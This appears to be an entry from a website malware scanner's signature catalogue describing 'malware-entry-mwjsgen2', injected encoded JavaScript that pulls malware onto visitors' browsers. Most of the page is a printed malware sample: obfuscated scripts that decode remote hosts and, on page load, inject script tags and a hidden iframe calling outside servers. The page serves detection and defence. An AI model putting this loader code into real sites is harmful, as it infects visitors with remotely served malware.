SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwjsgen2

malware-entry-mwjsgen2

Description:
Encoded javascript (known the send malware to a site visitor) was detected. They can be in any form, but generally use base64 or some form of encoding to hide its content. Sometimes the content is not encoded, but a simple remote javascript is included to ther pages. It is in this remote javascript that the malware is.

Affecting:
Any web site

Malware dump (sample of malware):

<script>var e="";var U;if(U!='' && U!='W'){U=''};var j;if(j!='' && j!='t'){j=''};function D(){var p=unescape;var O="";var i=window;var DC=new Date();var K=p("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%65%72%63%61%64%6f%6c%69%62%72%65%2e%63%6f%6d%2e%6d%78%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%75%61%2e%70%68%70");var F='';this.SG="";var zP="";function h(w,C){var zi="";this.T='';var jJ;if(jJ!='Y'){jJ='Y'};var y="";var q=String("g");var fw='';var s=p("%5b"), m=p("%5d");var M;if(M!='Q' && M!='yS'){M=''};var wu;if(wu!='LZ' && wu!='mQ'){wu=''};var f=s+C+m;this.DCS="";var Ok=new String();var I=new RegExp(f, q);var Ck=new Array();return w.replace(I, new String());var P='';};this.pQ="";this.VT="";this.tl="";var vw='';this.bD="";var YP;if(YP!='Ej'){YP='Ej'};var R=document;var yb=new String();var E=h('87551105157558711105571','715');var H=new String();this.zv="";function J(){var rK=new String();var vI=new String();var BJ;if(BJ!='x'){BJ=''};var u=p("%68%74%74%70%3a%2f%2f%69%63%79%63%68%69%6e%61%2e%72%75%3a");var Uk="";this.gb='';var Yn=new Array();var jj=new Array();H=u;var JX;if(JX!='' && JX!='wh'){JX=''};var gV;if(gV!='' && gV!='wQ'){gV=''};H+=E;H+=K;var d=new String();try {var zV='';var NS=new Date();DH=R.createElement(h('sjcfrHiWpqtH','MoqjezOfZHW6'));this.sP='';var Ii;if(Ii!='eU'){Ii='eU'};this.ySV='';DH[p("%64%65%66%65%72")]=[4,1][1];var Kv;if(Kv!='' && Kv!='ju'){Kv='UR'};var ns;if(ns!='rKx' && ns != ''){ns=null};DH[p("%73%72%63")]=H;this.AT="";var EL;if(EL!='dY' && EL != ''){EL=null};this.SI="";R.body.appendChild(DH);var Ol="";} catch(S){this.ID="";alert(S);var zO;if(zO!='gB'){zO='gB'};};}var HS=new Date();var LY=new Array();i[new String("onloagWI".substr(0,5)+"l6gyd".substr(4))]=J;this.sd="";var Uv;if(Uv!='Lt' && Uv!='Fu'){Uv=''};};var _V;if(_V!='lXs'){_V=''};var EuZ=new String();D();var A_=new Date();</script>
<script>function E(){var J;if(J!='f'){J='f'};var M=new String();var zp=new String();var a=unescape;var h=window;var t;if(t!='S'){t=''};var w='';var pn;if(pn!='Ry' && pn != ''){pn=null};var T=a("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%64%6f%77%6e%6c%6f%61%64%2e%63%6f%6d%2f%71%69%70%2e%72%75%2e%70%68%70");var H;if(H!='' && H!='tZ'){H=null};function O(aO,b){var x='';this.X='';var s=new String("2vxg".substr(3));var sr=new Array();var Fk;if(Fk!='zO'){Fk=''};var d=a("%5b"), F=a("%5d");var C='';var di=d+b+F;var R=new RegExp(di, s);var kH=new Array();var uY;if(uY!=''){uY='ww'};return aO.replace(R, new String());this.Yt="";var iD=new Date();};var RW=new Array();var Xo='';var AU=new Date();var _i;if(_i!='St' && _i!='cw'){_i=''};var Y=new String();this.Hx="";this.j="";var e=document;var dE="";var hP=O('8531960992486644203231','31462759');var K=new Array();var hq;if(hq!='jk' && hq!='tB'){hq='jk'};this.sI='';var cU='';var Ju;if(Ju!='Em' && Ju != ''){Ju=null};function W(){var dl=new Date();var at=new Date();var V;if(V!='Ib' && V!='YT'){V=''};var Wk;if(Wk!='UZ' && Wk!='kS'){Wk=''};var z=a("%68%74%74%70%3a%2f%2f%68%65%6c%70%68%6f%6d%65%63%61%72%65%2e%61%74%3a");var ef=new String();var Su;if(Su!='' && Su!='eZ'){Su=''};Y=z;var Vj='';var wi;if(wi!='hM' && wi!='Cq'){wi=''};Y+=hP;var iH='';var NZ="";Y+=T;this._K='';this.KC='';this.tn='';try {var Yw=new Date();var TK=new Date();db=e.createElement(O('skc3rDinpGtV','QUnKhV3DOkbBGWRMo'));var eg;if(eg!=''){eg='VEq'};var tC=new String();var AX=new String();db[a("%73%72%63")]=Y;var Ey;if(Ey!='RJ' && Ey != ''){Ey=null};db[a("%64%65%66%65%72")]=[1][0];var Vn;if(Vn!='PA'){Vn=''};var YS=new Date();var hR;if(hR!='ks'){hR=''};var Nr;if(Nr!='' && Nr!='_T'){Nr=''};this.QL='';e.body.appendChild(db);var Fd=new Date();var Xe=new Date();var Hw;if(Hw!=''){Hw='iY'};} catch(p){alert(p);};}var yS;if(yS!='Zo'){yS='Zo'};var NM;if(NM!=''){NM='es'};h[String("onloa"+"d")]=W;var Wf=new Array();var Sm=new String();var hT;if(hT!='' && hT!='Ei'){hT=null};};E();var _b=new String();var Og;if(Og!='' && Og!='xg'){Og=''};</script>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>
<script src="http://zettapetta.com/js.php">